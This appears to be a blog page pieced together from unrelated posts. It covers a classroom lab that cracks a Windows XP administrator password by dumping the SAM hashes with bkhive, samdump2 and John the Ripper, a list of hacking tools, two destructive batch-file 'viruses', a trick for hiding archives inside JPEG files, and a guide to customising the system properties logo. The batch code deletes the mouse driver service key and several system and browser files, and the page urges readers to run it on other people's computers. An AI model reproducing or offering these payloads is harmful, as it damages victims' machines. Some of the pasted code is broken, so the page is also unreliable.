Password Cracking

{ Using Kali, bkhive, samdump2, and John to crack the SAM Database  }

Section 0. Background Information

What is the SAM Database?

    • The SAM database is the Security Accounts Manager database, used by Windows that manages user accounts and other things. It is implemented as a registry file that is locked for exclusive use while the OS is running.
  1. What is Kali?
    • Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution.
    • Kali is a complete re-build of BackTrack Linux, adhering completely to Debian development standards, which contains for the following features:
      • More than 300 penetration testing tools
      • Vast wireless device support
      • Custom kernel patched for injection
      • Secure development environment
  2. What is bkhive?
    • bkhive dumps the syskey bootkey from Windows NT/2K/XP/Vista system hive.
  3. What is samdump2?
    • samdump2 dumps the Windows NT/2K/XP/Vista password hashes.
  4. What is John the Ripper?
    • John the Ripper is a free password cracking software tool. Initially developed for the Unix operating system, it now runs on fifteen different platforms (eleven of which are architecture-specific versions of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix versions (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL, and others.
  5. Lab Notes
    • In this lab we will do the following:
      1. We will boot Windows into Kali.
      2. We will use Kali to mount the Windows Disk Partition that contains the SAM Database.
      3. We will use bkhive and samdump2 to extract password hashes for each user.
      4. We will use John the Ripper to crack the administrator password.
  6. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with “no warranties, either express or implied.” The information contained is provided “as-is”, with “no guarantee of merchantability.”
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • Your are on notice, that continuing and/or using this lab outside your “own” test environment is considered malicious and is against the law.
    • © 2013 No content replication of any kind is allowed without express written permission.
Section 1. Log into Damn Vulnerable WXP-SP2
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button
  3. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine
  4. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: Use the Class Password or whatever you set it.
      3. Click the OK Button
Section 2. Change Administrator Password
  1. Open a Command Prompt
    • Instructions:
      1. Start –> All Programs –> Accessories –> Command Prompt
  2. Change the Administrator Password
    • Instructions:
      1. net user administrator football
    • Note(FYI):
      1. We are changing the password to something that is in the dictionary to show you how easily it can be cracked.
    • .
  3. Shutdown Windows Machine
    • Instructions:
      1. shutdown -s -t 0
    • Note(FYI):
      1. shutdown -s, shutdown the machine.
      2. -t 0, give the user a grace period of 0 seconds.  The default is 30 seconds.
Section 3. Configure Windows to boot from Kali
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on CD/DVD(IDE)
      2. Check the Connect at power on checkbox
      3. Click on the Use ISO Image File: radio button
      4. Click the Browse Button and Navigate to Kali.iso location
      5. Select the Kali.iso
      6. Click on the OK Button
Section 4. Power on Virtual Machine and Obtain Boot Menu
  1. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine
  2. Obtain Boot Menu
    • Instructions
      1. Once you see the below vmware screen, (1) Left Click in the screen and (2) press the “<Esc>” key
    • Note(FYI):
      1. This might take you a few times so be patient!!!
  3. Boot Menu Options
    • Instructions:
      1. Arrow Down to CD-ROM Drive
      2. Press <Enter>
Section 5. Mount Windows Disk Partition with Kali
  1. Kali Linux Boot Menu
    • Instructions:
      1. Arrow Down to Live (686-pae)
      2. Press <Enter>
    • Note(FYI):
      1. Note this will usually be the first selection.
  2. Open a Terminal Window
    • Instructions:
      1. Click on the Terminal Window Icon
  3. View and Mount Windows Disk
    • Instructions:
      1. fdisk -l
        • Where “-l” is the lower case letter L.
      2. mount -t ntfs /dev/sda1 /mnt
    • Note(FYI):
      1. The fdisk command will allow you to see the partition table for one or many disk(s)
      2. The mount command will mount a file system.  Since this is a Windows file system, I am specifying the “-t ntfs” option.
  4. View Mount Point
    • Instructions:
      1. df -k
    • Note(FYI):
      1. The df command reports on file system disk space usage.
      2. Arrow #1 is point to the Windows Disk.
      3. Arrow #2 is the /mnt point that the Windows Disk is not mounted on.
  5. View Windows Disk Contents
    • Instructions:
      1. cd /mnt
      2. ls
      3. cd WINDOWS/system32/config
    • Note(FYI):
      1. Since we mount the windows disk boot partition (/dev/sda1) on top of the /mnt directory, we have to cd into it to see its’ contents.
      2. The ls command will list the directories contents.
      3. This is where the SAM database lives.  The SAM database is where all the Windows passwords live. 
Section 6. Using bkhive and samdump2
  1. Using bkhive and samdump2
    • Instructions:
      1. ls
      2. bkhive system /root/hive.txt
      3. samdump2 SAM /root/hive.txt > /root/hash.txt
    • Note(FYI):
      1. ls the contents of the /WINDOWS/system32/config directory.
      2. bkhive dumps the syskey bootkey from Windows NT/2k/XP/Vista system hive.
      3. samdump2 dumps the Windows NT/2k/XP/Vista password hashes.
  2. View Hash Contents
    • Instructions:
      1. cd /root
      2. ls -l *.txt
      3. file *.txt
      4. cat hash.txt
    • Note(FYI):
      1. Change directory into /root, because that is where we put our hive and hash files.
      2. List out the files using a wildcard (*).
      3. Determine the file type of the hash and hive files, where the hash file is (ASCII) and the hive file is (Compressed Binary).
      4. View the contents of the hash file
Section 7. Using John the Ripper
  1. Run John the Ripper
    • Instructions:
      1. john /root/hash.txt -format=nt2 -users=Administrator
      2. cd /root/.john
      3. ls -l
      4. cat john.pot
    • Note(FYI):
      1. John is a password cracking tool.
      2. After john is ran, it stores the results in the .john directory under the current user’s home directory.  (e.g., /root/.john).
      3. Use “ls -l” to show the detail listing of the files.
      4. View the contents of the john.pot file which contains the cracked passwords.
Section 8. Proof of Lab
  1. Proof of Lab
    • Instructions:
      1. cd /root/.john
      2. ls -l
      3. cat john.pot
      4. date
      5. echo “Your Name”
        • This should be your actual name.
        • e.g., echo “John Gray”
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Past into a word document
      3. Upload to Moodle.
Section 9. Post Installation Instructions
  1. Un-Mount and Poweroff the Virtual Machine
    • Instructions:
      1. cd
      2. umount /mnt
      3. poweroff
  2. Remove Disc Message
    • Instructions:
      1. Press Enter
  3. Edit Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.
  4. Edit Virtual Machine Settings
    • Instructions:
      1. Click on CD/DVD(IDE)
      2. Click on the Use physical drive: radio button
      3. Select Auto detect from the down drop menu
      4. Click on the OK Button

Hacking Software

1. Nmap –The Network Mapper :

Nmap is one of the most widely used open source network mapping utility which scans & detects for ports, Operating systems, its services & used to manage networks. Nmap is available for windows & Linux also but it was  basically designed for a linux/Unix box, which works best with it also.

Learn More about Nmap

Download Nmap

2. John The Ripper Password Cracker

John the Ripper is a fastest password cracker, Now available for many distros of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches. It is also well known as JTR, the most deadliest cracker of all time.

Learn More About John The Ripper

Download John The Ripper

3. Nessus Remote Security Scanner

Nessus is basically a vulnerability scanner used by most of the well known organizations of the world for making their security audits. Nessus were open source in past, but now its a closed source one but a free software, which scans for thousands of general & critical vulnerability problems in any network.

Learn More About Nessus

Download Nessus

4. Wireshark – The Sniffer

It was formerly knows as Eathereal. It  is  network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. Its open sources’ness gives it to grow from all dimensions & it gives more than a quality network analyzers that are present in the market.

It have a GUI works great with both Linux & Windows.

Learn More About Wireshark

Download Wireshark

5. Eraser

Eraser is an advanced security tool (for Windows). We can completely remove sensitive data from your hard drive by overwriting it several times which is done with carefully selected patterns. Eraser is Free software and its source code is released under GNU General Public License as it is a open source one. Works with all versions of windows as -> Windows 95, 98, ME, NT, 2000, XP and DOS.  Its great tool for hiding secret things & mainly deleting it.

Learn More About Eraser

Download Eraser

6. LCP – Windows Password Cracker

LCP is one of the well known free software for cracking windows passwords in many versions like Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing can be easily done by LCP. It is similar to LOphtcrack.

It have various modes like bruteforce, dictionary attack & hybrid attack.

Learn More About LCP

Download LCP

7. Cain & Able Passwords Cracker

Its another password cracker for windows based system. P It collects passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, uncovering cached passwords, revealing password boxes,and analyzing routing protocols.

Interesting part is it sniffs itself, we don’t have to search for password files of any kind.

Learn More About Cain & Able

Download Cain & Able

8.SuperScan- Port Scanner

Superscan is great TCP/IP port scanner which is widely used for detecting the open ports or live hosts in given IP ranges. It have a GUI & made for windows & easy to use, don’t miss it.

Learn More About Superscan

Download Superscan

9. Nikto – CGI Scanner

Nikto is a great CGI scanner, which  is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items. Which includes 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers.

Learn More About Nikto

Download Nikto

10. Pof

Passive OS fingerprinting tool used widely for scanning operating system and it can scan for any operating system.

P0f can identify the operating system on:

– SYN Mode
– SYN+ACK mode,
– RST+ mode,
– machines whose communications you can observe.

It listens to any communication for detecting OS

remote administration tool in C language

Make a virus that disable Mouse

a batch virus which is harmfull it will disable your mouses think before trying it on yourself.

  • Open Notepad and copy below codes

rem ———————————
rem Disable Mouse
set key=”HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass”
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ———————————

  • Save this file as  virus.bat
  • Done you just created your virus.

Make a Simple Virus

plz dont try on your pc…

it is simple .bat file….


@echo off
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
@if exist C:\program files\internet explorer\iexplore.exe del C:\program files\internet explorer\iexplore.exe

Copy these lines in notepad and save it as “rinse.bat” or “rinse.exe”

Try this on any other computer….. Very heavy Virus.

How to hide files in JPEG pictures

If you’re looking to hide files on your PC hard drive, you may have read about ways to encrypt folders or change the attributes on a file so that they cannot be accessed by prying eyes. However, a lot of times hiding files or folders in that way requires that you install some sort of software on your computer, which could then be spotted by someone else.

I’ve actually written quite a few articles on how you can hide files and folders in Windows XP and Vista before, but here I’m going to show you a new way to hide files that is very counter-intuitive and therefore pretty safe! Using a simple trick in Windows, you can actually hide a file inside of the JPG picture file!

You can actually hide any type of file inside of an image file, including txt, exe, mp3, avi, or whatever else. Not only that, you can actually store many files inside of single JPG file, not just one! This can come in very handy if you need to hide files and don’t want to bother with encryption and all that other technical stuff.

Hide File in Picture

In order to accomplish this task, you will need to have either WinZip or WinRAR installed on your computer. You can download either of these two off the Internet and use them without having to pay anything. Here are the steps for creating your hidden stash:

  • Create a folder on your hard drive, i.e. C:\Test and put in all of the files that you want to hide into that folder. Also, place the image that you will be using to hide the files in.

hide file in jpg

  • Now select all of the files that you want to hide, right-click on them, and choose the option to add them to a compressed ZIP or RAR file. Only select the files you want to hide, not the picture. Name it whatever you want, i,e. “Hidden.rar”.

add to archive

  • Now you should have a folder that looks something like this with files, a JPG image, and a compressed archive:

hidden rar

  • Now here’s the fun part! Click on Start, and then click on Run. Type in “CMD” without the quotes and press Enter. You should now see the command prompt window open. Type in “CD \” to get to the root directory. Then type CD and the directory name that you created, i.e. “CD Test“.

cd test

  • Now type in the following line: “copy /b DSC06578.JPG + Hidden.rar DSC06578.jpg” and press Enter. Do not use the quotes. You should get a response like below:

hide files in jpg

Just make sure that you check the file extension on the compressed file, whether it is .ZIP or .RAR as you have to type out the entire file name with extension in the command. I have heard that some people say that they have had problems doing this with a .ZIP extension, so if that doesn’t work, make sure to compress to a .RAR file.

And that’s it! The picture file will have been updated with the compressed archive inside! You can actually check the file size of the picture and see that it has increased by the same amount as the size of the archive.

You can access your hidden file in two ways. Firstly, simply change the extension to .RAR and open the file using WinRAR. Secondly, you can just right-click on the JPG image and choose Open With and then scroll down to WinRAR. Either way, you’ll see your hidden files show up that you can then extract out.


That’s it! That is all it takes to hide files inside JPG picture files! It’s a great way simply because not many people know it’s possible and no one even thinks about a picture as having to the ability to “hide” files. Enjoy!

Windows XP System Properties – General Tab

System Properties, click Start and then Control Panel. From the Control Panel, double click System. Another way to bring up this box is to right click the My Computer on your desktop. From the menu, select Properties. A keyboard shortcut is to hold down the Windows Logo key in the bottom left of your keyboard. Keep it held down and press your Pause/Breakkey. You should see something like the following:

System Properties

The first tab of the System Properties box, General, shows you information about your version of Windows. As you can see, this computer is running XP with Service Pack 2 installed. The area at the bottom is just additional information. For the more adventurous amongst you, you change the logo and text below to something of your own. The part you’ll be changing is this part:

Change the Settings

Here’s how.

Navigate to this folder on your hard drive:


Look for a file called oeminfo.ini. Double click this, and it should open up in notepad. Here’s what ours looks like:

Manufacturer = Home and Learn
Model = Self-Built
[Support Information]
Line1 = Phone: 01642 868839
Line2 = Email:
You file needs to be set out like the one above. Just leave the parts that have square brackets – [general] and [Support Information]. Then change anything after the equals sign ( = ). We’ve highlighted in blue the parts that you can change. Add your own text in place of the blue text above.

You don’t need any Support Information. But if you only have Line1, then the Support Information button will be unavailable. If you add a Line2, then you’ll be able to click the button and see the rest of the text you typed.

To change the image to one of your own, you need an image that is no larger than this:

width = 180 pixels
height = 114 pixels

You can create your own in something like Photoshop or Paint Shop Pro (or even Paint). Then save your work as a BITMAP file (.bmp). But you need to save your work with the following name:


Once you’re happy with your new logo, copy and paste it to the folder you opened above (C:\WINDOWS\SYSTEM32). Launch the System Properties box again to view your work.

Here’s another General tab logo we created:

A New Logo

The image was created using a Tube in Paint Shop Pro. Very easy to do! If you’d like to practice with some Bitmap images we created, then download the images below. Change the name of an image to oemlogo.bmp before you copy and paste to the your SYSTEM32 folder.

%d bloggers like this: